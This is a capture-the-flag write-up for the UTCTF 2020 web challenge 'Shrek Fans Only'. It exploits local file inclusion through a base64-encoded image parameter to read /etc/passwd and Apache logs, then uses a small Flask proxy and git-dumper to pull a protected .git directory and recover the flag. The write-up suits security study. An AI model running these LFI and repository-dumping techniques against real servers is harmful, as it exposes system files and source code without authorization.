Shrek Fans Only [Web]
UTCTF 2020

Shrek Fans Only

Shrek seems to be pretty angry about something, so he deleted some important information off his site. He murmured something about Donkey being too committed to infiltrate his swamp. Can you checkout the site and see what the status is?

Recon

Website shows an image:

<img src="getimg.php?img=aW1nMS5qcGc%3D">

We can get LFI through that;

curl -s "http://3.91.17.218/getimg.php?img=`echo -n '/etc/passwd' | base64 -w0`"

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
[...]

Bash wrapper for ease of use; hax.sh

curl -s -vv "http://3.91.17.218/getimg.php?img=`echo -n "$1" | base64 -w0)`"

Usage: ./hax.sh "/etc/passwd"

What do

Not sure what to include during LFI, so we grep Apache2 error logs for inspiration:

./hax.sh "/var/log/apache2/error.log" | grep -i flag | grep -v "not found"

We come across:

client denied by server configuration: /var/www/html/.git/flags
client denied by server configuration: /var/www/html/.git/flag

And indeed, fetching HEAD works;

./hax.sh "/var/www/html/.git/HEAD"

But only through our LFI:

$ curl -vv "3.91.17.218/.git"

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>

Solution

We can write a proxy for that...

import requests
from flask import Flask
from base64 import b64encode

app = Flask(__name__)


@app.route("/.git/<path:path>")
def gitproxy(path):
    url = """http://3.91.17.218/getimg.php?img="""
    payload = "/var/www/html/.git/" + path
    payload = b64encode(payload.encode()).decode()

    resp = requests.get(url + payload)
    content = resp.content
    if b"xdebug-error xe-warning" in content:
        return "Not found", 404
    return content


app.run("127.0.0.1", port=1337, debug=True)

... so that we can lazily use git-dumper:

$ python git-dumper.py http://127.0.0.1:1337/.git/ /path/to/output
[-] Testing http://127.0.0.1:1337/.git/HEAD [200]
[-] Testing http://127.0.0.1:1337/.git/ [404]
[-] Fetching common files
[-] Fetching http://127.0.0.1:1337/.gitignore [404]
[-] Fetching http://127.0.0.1:1337/.git/COMMIT_EDITMSG [200]
[-] Fetching http://127.0.0.1:1337/.git/description [200]
[...]
[-] Finding packs
[-] Finding objects
[-] Fetching objects
[-] Fetching http://127.0.0.1:1337/.git/objects/5a/b449745b9c25fb0b56c5fbab8d0c986541233e [200]
[-] Fetching http://127.0.0.1:1337/.git/objects/00/00000000000000000000000000000000000000 [404]
[-] Fetching http://127.0.0.1:1337/.git/objects/c9/566ff84d2e1ae3339bc1e6303d6d3340b5789f [200]
[-] Fetching http://127.0.0.1:1337/.git/objects/75/9be945739b04b63a09e7c02d51567501ead033 [200]
[...]
[-] Running git checkout .

Running tig we can see a flag:

https://i.imgur.com/uzitos9.png

Flag

utflag{honey_i_shrunk_the_kids_HxSvO3jgkj}